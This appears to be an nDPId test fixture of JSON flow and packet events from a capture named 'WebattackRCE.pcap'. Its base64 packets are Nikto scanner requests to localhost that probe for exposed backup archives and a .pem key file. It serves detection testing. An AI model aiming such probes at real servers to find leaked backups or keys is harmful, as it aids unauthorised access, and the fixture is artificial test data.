00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1576420276893,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276893,"pkt":"AAAAAAAAAAAAAAAACABFAADFI6xAAEAGGIV\/AAABfwAAAcKoH5Ar0hvuzfCq7oAYAED+uQAAAQEICp1m+8WdZvvFR0VUIC8xMjcuMC4wLjEudGFyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276893,"flow_last_seen":1576420276893,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49832,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":145,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276894,"flow_last_seen":1576420276894,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276894,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49834,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1576420276894,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276894,"pkt":"AAAAAAAAAAAAAAAACABFAADDA5ZAAEAGOJ1\/AAABfwAAAcKqH5B\/mzvUPuYs44AYAED+twAAAQEICp1m+8adZvvGR0VUIC8xMjcudGFyLmJ6MiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276894,"flow_last_seen":1576420276894,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276894,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49834,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":146,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276896,"flow_last_seen":1576420276896,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49836,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1576420276896,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276896,"pkt":"AAAAAAAAAAAAAAAACABFAADD\/SZAAEAGPwx\/AAABfwAAAcKsH5AB18VtW5jVeIAYAED+twAAAQEICp1m+8idZvvIR0VUIC8xMjcudGFyLmJ6MiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276896,"flow_last_seen":1576420276896,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49836,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":147,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276897,"flow_last_seen":1576420276897,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276897,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49838,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1576420276897,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276897,"pkt":"AAAAAAAAAAAAAAAACABFAADFBrJAAEAGNX9\/AAABfwAAAcKuH5Ayaz75EQ6Mk4AYAED+uQAAAQEICp1m+8mdZvvJR0VUIC8xMjcuMC50YXIuYnoyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276897,"flow_last_seen":1576420276897,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276897,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49838,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":148,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276900,"flow_last_seen":1576420276900,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276900,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49840,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1576420276900,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276900,"pkt":"AAAAAAAAAAAAAAAACABFAADFczBAAEAGyQB\/AAABfwAAAcKwH5A3G0tor3ywHoAYAED+uQAAAQEICp1m+8ydZvvMR0VUIC8xMjcuMC50YXIuYnoyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":148,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276900,"flow_last_seen":1576420276900,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276900,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49840,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":149,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276901,"flow_last_seen":1576420276901,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49842,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1576420276901,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276901,"pkt":"AAAAAAAAAAAAAAAACABFAADD0l1AAEAGadV\/AAABfwAAAcKyH5CdU+oT47LjtYAYAED+twAAAQEICp1m+82dZvvNR0VUIC9zaXRlLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276901,"flow_last_seen":1576420276901,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49842,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":150,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276903,"flow_last_seen":1576420276903,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49844,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1576420276903,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276903,"pkt":"AAAAAAAAAAAAAAAACABFAADDR55AAEAG9JR\/AAABfwAAAcK0H5AcfX\/WOy6jEYAYAED+twAAAQEICp1m+8+dZvvOR0VUIC9zaXRlLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276903,"flow_last_seen":1576420276903,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49844,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":151,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276904,"flow_last_seen":1576420276904,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276904,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49846,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1576420276904,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276904,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/WUtAAEAG4ut\/AAABfwAAAcK2H5D8ZmEEi9guOYAYAED+swAAAQEICp1m+9CdZvvQR0VUIC8xMjcucGVtIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276904,"flow_last_seen":1576420276904,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276904,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49846,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":152,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276905,"flow_last_seen":1576420276905,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49848,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1576420276905,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276905,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/HslAAEAGHW5\/AAABfwAAAcK4H5CgfyaOuiPkq4AYAED+swAAAQEICp1m+9GdZvvRR0VUIC8xMjcucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276905,"flow_last_seen":1576420276905,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49848,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276907,"flow_last_seen":1576420276907,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49850,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1576420276907,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276907,"pkt":"AAAAAAAAAAAAAAAACABFAAC9zZ5AAEAGbpp\/AAABfwAAAcK6H5CXJ\/XXeafd0YAYAED+sQAAAQEICp1m+9OdZvvSR0VUIC8wLnRhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276907,"flow_last_seen":1576420276907,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49850,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":154,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276908,"flow_last_seen":1576420276908,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49852,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1576420276908,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276908,"pkt":"AAAAAAAAAAAAAAAACABFAAC9umJAAEAGgdZ\/AAABfwAAAcK8H5Cw+YIsSeaYa4AYAED+sQAAAQEICp1m+9SdZvvUR0VUIC8wLnRhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276908,"flow_last_seen":1576420276908,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49852,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276910,"flow_last_seen":1576420276910,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49854,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
